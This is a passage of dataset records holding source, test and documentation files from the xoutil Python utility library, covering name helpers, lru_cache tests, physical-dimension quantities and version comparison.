**kwargs)\n\n klass = meta(target.__name__, (target,), {\"__new__\": new})\n return klass\n else:\n\n def _unstable(*args, **kwargs):\n message = msg.format(objtype, nameof(target, inner=True, full=True))\n warnings.warn(message, stacklevel=2)\n return target(*args, **kwargs)\n\n return _unstable\n\n\ndel decorator\n" }, { "alpha_fraction": 0.6149019598960876, "alphanum_fraction": 0.6152940988540649, "avg_line_length": 27.0219783782959, "blob_id": 
"f371a6b92897c70c145632b1ecb6d8f7476abc01", "content_id": "c4f4288d0519cf6c26ecf99516e353a134a29111", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2550, "license_type": "permissive", "max_line_length": 93, "num_lines": 91, "path": "/docs/source/xotl.tools/names.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "=================================================================\n `xotl.tools.names`:mod: -- Utilities for handling objects names\n=================================================================\n\n.. automodule:: xotl.tools.names\n\n.. autofunction:: nameof(*objects, depth=1, inner=False, typed=False, full=False, safe=False)\n\n.. autofunction:: identifier_from(obj)\n\n\n.. _name-of-narrative:\n\nUse cases for getting the name of an object\n===========================================\n\nThe function `nameof`:func: is useful for cases when you get a value and you\nneed a name. This is a common need when doing framework-level code that tries\nto avoid repetition of concepts.\n\n\nSolutions with `nameof`:func:\n-----------------------------\n\nProperly calculate the tasks' name in Celery applications\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nCelery_ warns about how to import the tasks. If in a module you import your\ntask using an absolute import, and in another module you import it using a\nrelative import, Celery regards them as different tasks. You must either use\na consistent import style, or give a name for the task. Using `nameof` you\ncan easily fix this problem.\n\nAssume you create a ``celapp.tasks.basic`` module with this code:\n\n.. testsetup:: celapp.tasks.basic\n\n __name__ = 'celapp.tasks.basic'\n\n.. doctest:: celapp.tasks.basic\n\n >>> def celery_task(celeryapp, *args, **kwargs):\n ... def decorator(func):\n ... from xotl.tools.names import nameof\n ... 
taskname = nameof(func, full=True, inner=True)\n ... return celeryapp.task(name=taskname, *args, **kwargs)(func)\n ... return decorator\n\n >>> from celery import Celery\n >>> app = Celery()\n >>> @celery_task(app)\n ... def add(x, y):\n ... return x + y\n\nThen importing the task directly in a shell will have the correct name::\n\n >>> from celapp.tasks.basic import add\n >>> add.name\n 'celapp.tasks.basic.add'\n\nAnother module that imports the task will also see the proper name. Say you\nhave the module ``celapp.consumer``:\n\n\n.. testsetup:: celapp.consumer\n\n __name__ = 'celapp.consumer'\n\n\n.. doctest:: celapp.consumer\n\n >>> from .tasks import basic\n\n >>> def get_name(taskname):\n ... task = getattr(basic, taskname)\n ... return task.name\n\nThen:\n\n.. doctest::\n\n >>> from celapp.consumer import get_name\n >>> get_name('add')\n 'celapp.tasks.basic.add'\n\n\nDespite that you imported the ``basic`` module with a relative import the name\nis fully calculated.\n\n\n.. _Celery: http://celeryproject.org/\n" }, { "alpha_fraction": 0.7361963391304016, "alphanum_fraction": 0.7361963391304016, "avg_line_length": 39.75, "blob_id": "9f2404df855d997ba009a338713d12627c20550f", "content_id": "3d526a2043774fdfa58df8a1b86b313347938284", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 163, "license_type": "permissive", "max_line_length": 75, "num_lines": 4, "path": "/docs/source/history/_changes-1.6.9.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- The `defaults` argument in `xoutil.objects.smart_copy`:func: is now\n keyword-only.\n\n- `xoutil.context`:mod: is now greenlet-safe without depending of `gevent`.\n" }, { "alpha_fraction": 0.6577181220054626, "alphanum_fraction": 0.6599552631378174, "avg_line_length": 30.928571701049805, "blob_id": "8701a75524bafa77d18a31837056e66d929f7299", "content_id": 
"e43241f5ea9a9645530c54eadc0dbbbe849d679e", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 447, "license_type": "permissive", "max_line_length": 76, "num_lines": 14, "path": "/docs/source/history/_changes-1.6.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix encoding issues in `xoutil.string.cut_prefix`:func: and\n `xoutil.string.cut_suffix`:func:.\n\n Previously this code failed::\n\n >>> from xoutil.string import cut_prefix\n >>> cut_prefix(u'-\\xe1', '-')\n Traceback ...\n ...\n UnicodeEncodeError: 'ascii' ...\n\n Now both functions force its second argument to be of the same type of the\n first. See `xoutil.string.safe_decode`:func: and\n `xoutil.string.safe_encode`:func:.\n" }, { "alpha_fraction": 0.751724123954773, "alphanum_fraction": 0.7586206793785095, "avg_line_length": 71.5, "blob_id": "976f4c178c99e414c1fc98bd8ec08f5550e7f1d4", "content_id": "7f87e032be463c1cda500310dd2eb0973b9b3389", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 145, "license_type": "permissive", "max_line_length": 78, "num_lines": 2, "path": "/docs/source/history/_changes-1.7.6.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix a bug in `xoutil.datetime.TimeSpan`:class: for Python 2. 
Representing a\n time span might fail with a 'Maximum Recursion Detected' error.\n" }, { "alpha_fraction": 0.5051029920578003, "alphanum_fraction": 0.5399888753890991, "avg_line_length": 31.859756469726562, "blob_id": "2bd4e2ebfa4355b70b599b4ae4de0384918eefbd", "content_id": "42d0b0d87bbdf162d81d7120cd022eba7ddffbfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5389, "license_type": "no_license", "max_line_length": 81, "num_lines": 164, "path": "/tests/test_functools2.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "# Copied from Python 3.3 base code\n#\n# Copyright (c) 2001-2012, 2017 Python Software Foundation. All rights reserved.\n#\n\nfrom xoutil.future import functools\nimport unittest\nfrom random import choice\n\n\nclass TestLRU(unittest.TestCase):\n def test_lru(self):\n def orig(x, y):\n return 3 * x + y\n\n f = functools.lru_cache(maxsize=20)(orig)\n hits, misses, maxsize, currsize = f.cache_info()\n self.assertEqual(maxsize, 20)\n self.assertEqual(currsize, 0)\n self.assertEqual(hits, 0)\n self.assertEqual(misses, 0)\n\n domain = range(5)\n for i in range(1000):\n x, y = choice(domain), choice(domain)\n actual = f(x, y)\n expected = orig(x, y)\n self.assertEqual(actual, expected)\n hits, misses, maxsize, currsize = f.cache_info()\n self.assertTrue(hits > misses)\n self.assertEqual(hits + misses, 1000)\n self.assertEqual(currsize, 20)\n\n f.cache_clear() # test clearing\n hits, misses, maxsize, currsize = f.cache_info()\n self.assertEqual(hits, 0)\n self.assertEqual(misses, 0)\n self.assertEqual(currsize, 0)\n f(x, y)\n hits, misses, maxsize, currsize = f.cache_info()\n self.assertEqual(hits, 0)\n self.assertEqual(misses, 1)\n self.assertEqual(currsize, 1)\n\n # Test bypassing the cache\n self.assertIs(f.__wrapped__, orig)\n f.__wrapped__(x, y)\n hits, misses, maxsize, currsize = f.cache_info()\n self.assertEqual(hits, 0)\n self.assertEqual(misses, 1)\n 
self.assertEqual(currsize, 1)\n\n # test size zero (which means \"never-cache\")\n @functools.lru_cache(0)\n def f():\n global f_cnt\n f_cnt += 1\n return 20\n\n self.assertEqual(f.cache_info().maxsize, 0)\n global f_cnt\n f_cnt = 0\n for i in range(5):\n self.assertEqual(f(), 20)\n self.assertEqual(f_cnt, 5)\n hits, misses, maxsize, currsize = f.cache_info()\n self.assertEqual(hits, 0)\n self.assertEqual(misses, 5)\n self.assertEqual(currsize, 0)\n\n # test size one\n @functools.lru_cache(1)\n def f():\n global f_cnt\n f_cnt += 1\n return 20\n\n self.assertEqual(f.cache_info().maxsize, 1)\n f_cnt = 0\n for i in range(5):\n self.assertEqual(f(), 20)\n self.assertEqual(f_cnt, 1)\n hits, misses, maxsize, currsize = f.cache_info()\n self.assertEqual(hits, 4)\n self.assertEqual(misses, 1)\n self.assertEqual(currsize, 1)\n\n # test size two\n @functools.lru_cache(2)\n def f(x):\n global f_cnt\n f_cnt += 1\n return x * 10\n\n self.assertEqual(f.cache_info().maxsize, 2)\n f_cnt = 0\n for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:\n # * * * *\n self.assertEqual(f(x), x * 10)\n self.assertEqual(f_cnt, 4)\n hits, misses, maxsize, currsize = f.cache_info()\n self.assertEqual(hits, 12)\n self.assertEqual(misses, 4)\n self.assertEqual(currsize, 2)\n\n def test_lru_with_maxsize_none(self):\n @functools.lru_cache(maxsize=None)\n def fib(n):\n if n < 2:\n return n\n return fib(n - 1) + fib(n - 2)\n\n self.assertEqual(\n [fib(n) for n in range(16)],\n [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610],\n )\n self.assertEqual(\n fib.cache_info(),\n functools._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16),\n )\n fib.cache_clear()\n self.assertEqual(\n fib.cache_info(),\n functools._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0),\n )\n\n def test_lru_with_exceptions(self):\n # Verify that user_function exceptions get passed through without\n # creating a hard-to-read chained exception.\n # http://bugs.python.org/issue13177\n for maxsize in (None, 
100):\n\n @functools.lru_cache(maxsize)\n def func(i):\n return \"abc\"[i]\n\n self.assertEqual(func(0), \"a\")\n with self.assertRaises(IndexError) as cm: # noqa\n func(15)\n # The following is only valid in Py33 PEP 3143\n ## self.assertIsNone(cm.exception.__context__)\n\n # Verify that the previous exception did not result in a cached\n # entry\n with self.assertRaises(IndexError):\n func(15)\n\n def test_lru_with_types(self):\n for maxsize in (None, 100):\n\n @functools.lru_cache(maxsize=maxsize, typed=True)\n def square(x):\n return x * x\n\n self.assertEqual(square(3), 9)\n self.assertEqual(type(square(3)), type(9))\n self.assertEqual(square(3.0), 9.0)\n self.assertEqual(type(square(3.0)), type(9.0))\n self.assertEqual(square(x=3), 9)\n self.assertEqual(type(square(x=3)), type(9))\n self.assertEqual(square(x=3.0), 9.0)\n self.assertEqual(type(square(x=3.0)), type(9.0))\n self.assertEqual(square.cache_info().hits, 4)\n self.assertEqual(square.cache_info().misses, 4)\n" }, { "alpha_fraction": 0.6540642976760864, "alphanum_fraction": 0.6654064059257507, "avg_line_length": 28.38888931274414, "blob_id": "20738746f81d4cf0080cdfb0bc997623d7c1573e", "content_id": "2b7ecb800603f35d2c1e8f90f266baa5d4ea87f8", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 529, "license_type": "permissive", "max_line_length": 78, "num_lines": 18, "path": "/docs/source/xotl.tools/future/textwrap.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.textwrap`:mod: - Text wrapping and filling\n=============================================================\n\n.. module:: xotl.tools.future.textwrap\n\nThis module extends the standard library's `textwrap`:mod:. 
You may use it as\na drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nWe added the following features.\n\n.. autofunction:: dedent\n\nWe have backported several Python 3.3 features but maybe not all.\n\n.. autofunction:: indent\n" }, { "alpha_fraction": 0.7407932281494141, "alphanum_fraction": 0.743626058101654, "avg_line_length": 36.157894134521484, "blob_id": "8e713ff4460d6cefdfcafb757f5c24bb376fd3ac", "content_id": "115bc962796ab355077a1722200766e58a822b1b", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 706, "license_type": "permissive", "max_line_length": 73, "num_lines": 19, "path": "/docs/source/history/_changes-1.8.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Remove deprecated `xoutil.objects.get_and_del_first_of`:func:,\n `xoutil.objects.smart_getattr`:func:, and\n `xoutil.objects.get_and_del_attr`:func:.\n\n- Remove deprecated arguments from `xoutil.objects.xdir`:func: and\n `xoutil.objects.fdir`:func:.\n\n- Fix bug #17: `xoutil.fp.tools.compose`:class: is not wrappable.\n\n- Move `xoutil.decorator.memoized_property`:class: to\n `xoutil.objects.memoized_property`:class: module. Deprecate the first.\n\n- Deprecate `xoutil.decorator.memoized_instancemethod`:class:.\n\n- Deprecate `xoutil.decorator.reset_memoized`:func:. 
Use\n `~xoutil.decorator.memoized_property.reset`:meth:.\n\n- Fix bug (unregistered): `xoutil.objects.traverse`:func: ignores its\n `getter`.\n" }, { "alpha_fraction": 0.6191198825836182, "alphanum_fraction": 0.6221547722816467, "avg_line_length": 17.828571319580078, "blob_id": "44a1250122413defb5e6db5e6e78ea0396a6565c", "content_id": "50dcb4cc0cf824caf6e7d28d1d3b421ff83c68f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 660, "license_type": "no_license", "max_line_length": 75, "num_lines": 35, "path": "/tests/testbed.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"This module simply serves the purposes of the testing weaving modules\"\"\"\n\nfrom xoutil.modules import moduleproperty, modulemethod\n\n\ndef echo(what):\n return what\n\n\n@moduleproperty\ndef this(self):\n return self\n\n\ndef rien():\n return 1\n\n\n@modulemethod\ndef method(self, *args, **kwargs):\n return self, args, kwargs\n\n\n@modulemethod\ndef selfish(self):\n return self.selfish, selfish\n" }, { "alpha_fraction": 0.6309962868690491, "alphanum_fraction": 0.6457564830780029, "avg_line_length": 26.100000381469727, "blob_id": "ca5a4c9451cd8561b941691fa077d34ea804d956", "content_id": "2a7ca238545e131382eadf2395f1aaf1db2f196b", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 543, "license_type": "permissive", "max_line_length": 77, "num_lines": 20, "path": "/docs/source/xotl.tools/future/csv.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": 
"`xotl.tools.future.csv`:mod: - CSV parsing and writing extensions\n=================================================================\n\n.. module:: xotl.tools.future.csv\n\n.. versionadded:: 1.8.4\n\nThis module extends the standard library's `csv`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nWe added the following features.\n\n.. autoclass:: unix_dialect\n\n Added only in Python 2 for compatibility purposes.\n\n.. autofunction:: parse\n" }, { "alpha_fraction": 0.6028416752815247, "alphanum_fraction": 0.6171854138374329, "avg_line_length": 22.915857315063477, "blob_id": "3d66ff2c7eaa9dcef7942cd78d234c7bb24ce7f6", "content_id": "d9b509828d96b128bb80ed81a2d81db22e6720e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7391, "license_type": "no_license", "max_line_length": 76, "num_lines": 309, "path": "/tests/test_dim.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport pytest\nfrom hypothesis import given, strategies as s\n\nfrom xoutil.dim.meta import Signature, Quantity, Dimension, Scalar, UNIT\n\n\n# A reasonable exponent. 
We won't be dealing with universes of 100s\n# dimensions.\nexponents = s.integers(min_value=1, max_value=10)\nsignatures = s.text(alphabet=\"abcdefghijok\", min_size=0, max_size=10)\n\n\ndef test_usage():\n @Dimension.new\n class L:\n metre = UNIT\n kilometre = 1000 * metre\n\n @Dimension.new\n class T:\n second = UNIT\n\n m, km = L.metre, L.kilometre\n s = T.second\n\n assert isinstance(m, L)\n assert not isinstance(1, L)\n assert isinstance(s, T)\n\n assert -km == -1 * km == -(1000 * m)\n assert +km == km\n\n Speed = L / T\n\n assert isinstance(m / s, Speed)\n assert not isinstance(m, T)\n\n assert hasattr(L / T, \"metre_per_second\")\n\n assert 10 * km == 10000 * m\n assert m < km\n\n with pytest.raises(TypeError):\n 10 + 10 * km\n\n with pytest.raises(TypeError):\n m + s\n\n assert Speed.metre_per_second == m / s\n\n Acceleration = L / (T * T)\n assert hasattr(Acceleration, \"metre_per_second_squared\")\n # however:\n Not_Acceleration = L / T * T\n assert hasattr(Not_Acceleration, \"metre_per_second_second\")\n assert L == Not_Acceleration, \"It is the same as Length\"\n\n\ndef test_effort():\n @Dimension.new\n class Workforce:\n men = UNIT\n\n @Dimension.new\n class Time:\n second = UNIT\n\n class Effort(Workforce * Time):\n # Since the canonical unit of a composed quantity type is built from\n # the canonical units of the operands, but the true \"canonical type\"\n # of effort is usually men-hour we re-introduce it.\n men_hour = 60\n\n assert Effort.men_hour > Effort.men_second\n\n\ndef test_scalar_downgrade():\n from xoutil.dim.base import L\n\n km = L.km\n assert not isinstance(km / km, Quantity)\n assert km / km == 1\n assert not isinstance(km // km, Quantity)\n assert km // km == 1\n\n assert not isinstance(1 / km * km, Quantity)\n assert float(1 / km * km)\n\n\ndef test_natural_downgrade():\n from xoutil.dim.base import L\n\n km, cm = L.km, L.cm\n assert float(km) == 1000\n assert int(cm) == 0\n\n\ndef test_decimals():\n import decimal\n from 
xoutil.dim.base import m\n\n with pytest.raises(TypeError):\n third = decimal.Decimal(\"0.33\") * m\n assert third < m\n\n\ndef test_signatures():\n distance = Signature(\"m\")\n time = Signature(\"s\")\n freq = 1 / time\n speed = distance / time\n acceleration = speed / time\n assert acceleration == distance / (time * Signature(\"s\"))\n assert speed == distance * freq\n assert speed ** 3 == speed * speed * speed\n assert speed ** 0 == Signature() == speed / speed\n assert speed ** -3 == 1 / (speed ** 3)\n\n\n@given(signatures, signatures)\ndef test_signatures_are_always_simplified(top, bottom):\n s = Signature(top, bottom)\n assert all(t not in s.bottom for t in s.top)\n assert all(b not in s.top for b in s.bottom)\n r = Signature(bottom, top)\n assert s.top == r.bottom and s.bottom == r.top\n\n s2 = Signature(top + bottom, bottom)\n assert s2 == Signature(top, None)\n s3 = Signature(top, top + bottom)\n assert s3 == Signature(None, bottom)\n\n\ndef test_quantity_math():\n metre = m = Quantity(1, Signature(\"m\"))\n second = Quantity(1, Signature(\"s\"))\n\n with pytest.raises(TypeError):\n metre < second\n\n assert metre < 2 * metre < (metre + 2 * metre)\n assert metre * metre == Quantity(1, Signature(\"mm\"))\n assert metre / second == Quantity(1, Signature(\"m\", \"s\"))\n assert metre * metre * metre == metre ** 3\n assert 1 / (metre * metre * metre) == metre ** -3\n\n assert 1000 * m % 3 == 1 * m\n assert 5 % (2 * m) == 1 / m\n assert 5 / (2 * m) == 2.5 / m\n\n with pytest.raises(TypeError):\n 5 ** (2 * m)\n\n\ndef test_quantity_type_definitions():\n from xoutil.dim.base import Length, Time\n\n assert isinstance(Length, Dimension)\n assert isinstance(Time, Dimension)\n assert isinstance(Length / Time, Dimension)\n assert isinstance(Length ** 2, Dimension)\n assert Length * Length == Length ** 2\n\n assert Time / Time == Scalar\n assert Time / Time * Time == Time\n\n with pytest.raises(TypeError):\n Length + Time\n\n with pytest.raises(TypeError):\n Length - 
Time\n\n assert Length ** 1 is Length\n\n with pytest.raises(TypeError):\n Length ** 1.2\n\n assert Length ** 0 == Scalar\n assert Length ** -1 == 1 / Length\n\n with pytest.raises(TypeError):\n 2 / Length\n\n with pytest.raises(TypeError):\n 2 * Length\n\n\n@given(exponents, exponents)\ndef test_general_power_rules(n, m):\n from xoutil.dim.base import L\n\n assert L ** n / L ** m == L ** (n - m)\n\n\n@given(s.floats(allow_nan=False) | s.integers())\ndef test_any_magnitude(m):\n from xoutil.dim.base import L\n\n assert float(m * L.metre) == float(m)\n\n\n@given(s.floats(allow_nan=False, allow_infinity=False) | s.integers())\ndef test_any_magnitude_noinf(m):\n from xoutil.dim.base import L\n from math import ceil, floor\n\n Int = int\n q = m * L.metre\n for f in (Int, float, abs, round, ceil, floor):\n assert f(q) == f(m)\n\n\ndef test_currencies():\n from xoutil.dim.currencies import Rate, Valuation, currency\n\n dollar = USD = currency(\"USD\")\n euro = EUR = currency(\"EUR\")\n rate = 1.19196 * USD / EUR\n\n assert isinstance(dollar, Valuation)\n assert isinstance(rate, Rate)\n\n # Even 0 dollars are a valuation\n assert isinstance(dollar - dollar, Valuation)\n\n # But 1 is not a value nor a rate\n assert not isinstance(dollar / dollar, Valuation)\n assert not isinstance(dollar / dollar, Rate)\n\n assert currency(\"a\") is currency(\"A\")\n\n with pytest.raises(TypeError):\n dollar + euro\n\n\ndef test_undistinguishable_definitions():\n from xoutil.dim.base import L\n\n @Dimension.new\n class Length:\n metre = UNIT\n\n assert L.metre == Length.metre\n\n @Dimension.new\n class Length:\n km = UNIT\n\n with pytest.raises(TypeError):\n assert L.metre != Length.km\n\n\ndef test_bug_30():\n from xoutil.dim.meta import Dimension, UNIT\n\n @Dimension.new\n class L:\n m = UNIT\n\n with pytest.raises(TypeError):\n\n class LL(L):\n mm = UNIT\n\n\ndef test_custom_quantity():\n class NewQuantity(Quantity):\n pass\n\n class NewDim(Dimension):\n Quantity = NewQuantity\n\n 
@NewDim.new\n class Length:\n m = UNIT\n\n m = Length.m\n Area = Length ** 2\n\n assert isinstance(m, NewQuantity)\n assert isinstance(1000 * m, NewQuantity)\n assert isinstance(Area._unit_, NewQuantity)\n\n @Dimension.new(Quantity=NewQuantity)\n class Time:\n s = UNIT\n\n Freq = 1 / Time\n assert isinstance(Time.s, NewQuantity)\n assert isinstance(Freq._unit_, NewQuantity)\n\n @NewDim.new(Quantity=Quantity)\n class Time:\n s = UNIT\n\n Freq = 1 / Time\n assert not isinstance(Time.s, NewQuantity)\n assert isinstance(Time.s, Quantity)\n assert not isinstance(Freq._unit_, NewQuantity)\n assert isinstance(Freq._unit_, Quantity)\n" }, { "alpha_fraction": 0.7301587462425232, "alphanum_fraction": 0.7301587462425232, "avg_line_length": 46.25, "blob_id": "ffc1c74605d5271ae1f49d193043af6aa3180551", "content_id": "f7cd782e1df7d861d69dbe3b3b372ee31546bdb4", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 189, "license_type": "permissive", "max_line_length": 78, "num_lines": 4, "path": "/docs/source/history/_changes-1.9.6.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add parameter 'encoding' to `xoutil.eight.string.force`:func: and\n `xoutil.eight.string.safe_join`:func:.\n\n- Add `xoutil.fp.iterators`:mod: and `xoutil.fp.iterators.iter_compose`:func:.\n" }, { "alpha_fraction": 0.4535315930843353, "alphanum_fraction": 0.45724907517433167, "avg_line_length": 16.933332443237305, "blob_id": "0eb435af3eb2fa8f7c0373add09e1d10514224fe", "content_id": "16f835c3f49cfb2c18b9c15aff10a4bec30e7b54", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 269, "license_type": "permissive", "max_line_length": 73, "num_lines": 15, "path": "/docs/source/xotl.tools/future.rst", "repo_name": 
"merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future`:mod: - Extend standard modules with \"future\" features\n=========================================================================\n\n.. automodule:: xotl.tools.future\n :members:\n\n\nContents\n--------\n\n.. toctree::\n :maxdepth: 1\n :glob:\n\n future/*\n" }, { "alpha_fraction": 0.4434782564640045, "alphanum_fraction": 0.48695650696754456, "avg_line_length": 45, "blob_id": "4c16f8fc5eaf870123e0220737d8decedcc777cf", "content_id": "1c17fe550e14f5e460004ca4f4df91bcf3d6c30d", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 230, "license_type": "permissive", "max_line_length": 77, "num_lines": 5, "path": "/docs/source/xotl.tools/bases.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.bases`:mod: - Numeric base 32 and base 64 integer representations\n=============================================================================\n\n.. 
automodule:: xotl.tools.bases\n :members: int2str, str2int, B32, B64\n" }, { "alpha_fraction": 0.6213425397872925, "alphanum_fraction": 0.6230636835098267, "avg_line_length": 28.049999237060547, "blob_id": "0105e31202978505c453e73c130623c7a75af44b", "content_id": "0616c8410dc22d8dd460a5e5dd908a7b37fa37e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 582, "license_type": "no_license", "max_line_length": 76, "num_lines": 20, "path": "/xotl/tools/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\"\"\"Collection of disparate utilities.\n\n``xotl.tools`` is essentially an extension to the Python's standard library,\nit does not make up a full framework, but it's very useful to be used from a\ndiversity of scenarios.\n\n\"\"\"\n\nfrom ._version import get_versions\n\n__version__ = get_versions()[\"version\"]\ndel get_versions\n" }, { "alpha_fraction": 0.5383942723274231, "alphanum_fraction": 0.5432026982307434, "avg_line_length": 27.4771785736084, "blob_id": "099e19b63126de6a5949a946f053cf5ac4dc7145", "content_id": "ca32a923d3f56dc59ee0b1b11b6cc69c21e7b307", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6864, "license_type": "no_license", "max_line_length": 80, "num_lines": 241, "path": "/xotl/tools/versions.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what 
the LICENCE file allows you to.\n#\n\n# TODO: Document (version.rst) this module. Add tests.\n\"\"\"Versions API\n\n\"\"\"\n\nfrom xotl.tools.decorator import singleton\n\n\ndef _check(info):\n \"\"\"Validate a version info.\n\n :param info: could be a string, an integer, float, or any integer\n collection (only first three valid integers are used).\n\n :returns: a valid tuple or an error if invalid.\n\n \"\"\"\n from collections import Iterable\n from distutils.version import LooseVersion, StrictVersion\n\n MAX_COUNT = 3\n if isinstance(info, (int, float)):\n aux = str(info)\n elif isinstance(info, Iterable) and not isinstance(info, str):\n aux = \".\".join(map(str, info))\n else:\n aux = info\n if isinstance(aux, str):\n try:\n essay = StrictVersion(aux)\n except (TypeError, ValueError): # Being as safe as possible.\n essay = LooseVersion(aux)\n res = essay.version[:MAX_COUNT]\n if any(res):\n return tuple(res)\n else:\n raise ValueError(\"invalid version value '{}'\".format(info))\n else:\n msg = \"Invalid type '{}' for version '{}'\"\n raise TypeError(msg.format(type(info).__name__, info))\n\n\nclass ThreeNumbersVersion(tuple):\n \"\"\"Structured version info considering valid first 3 members\n\n This class is mainly intended to be sub-classed as a singleton resulting\n in a tuple with three integer components as 'major', 'minor', and 'micro'.\n\n Instances of this class can be compared with a variety of value types:\n\n - An integer with the 'major' component.\n\n - A float with the ('major', 'minor') components.\n\n - A string is converted to a version tuple before compare it.\n\n - Any collection with a prefix of at least three logical integers (that is\n ``[1.3, '2a']`` is the same as ``'1.3.2a'`` and ``(1, 3, 2)``).\n\n Equality comparison is relevant only for heading values: ``3.1 == 3``.\n\n .. 
versionadded:: 1.8.0\n\n \"\"\"\n\n def __new__(cls, info):\n MAX_COUNT = 3\n head = _check(info)\n tail = (0,) * (MAX_COUNT - len(head))\n return super().__new__(cls, head + tail)\n\n @property\n def major(self):\n return self[0]\n\n @property\n def minor(self):\n return self[1]\n\n @property\n def micro(self):\n return self[2]\n\n def to_float(self):\n return float(\"{}.{}\".format(*self[:2]))\n\n __float__ = to_float\n __trunc__ = major\n\n def __eq__(self, other):\n try:\n aux = _check(other)\n this = self[: len(aux)]\n return this == aux\n except (TypeError, ValueError):\n return False\n\n def __lt__(self, other):\n try:\n return tuple(self) < _check(other)\n except (TypeError, ValueError):\n return NotImplemented\n\n def __gt__(self, other):\n try:\n return tuple(self) > _check(other)\n except (TypeError, ValueError):\n return NotImplemented\n\n def __ne__(self, other):\n return not (self == other)\n\n def __le__(self, other):\n return not (self > other)\n\n def __ge__(self, other):\n return not (self < other)\n\n\n@singleton\nclass python_version(ThreeNumbersVersion):\n \"\"\"Current Python version.\n\n Initialized with `~sys.version_info`:obj: 5 components tuple.\n\n Extra components (besides 'major', 'minor', and 'micro') are:\n 'releaselevel' (a string that could be 'alpha', 'beta', 'candidate', or\n 'final'), and 'serial' (an integer). 
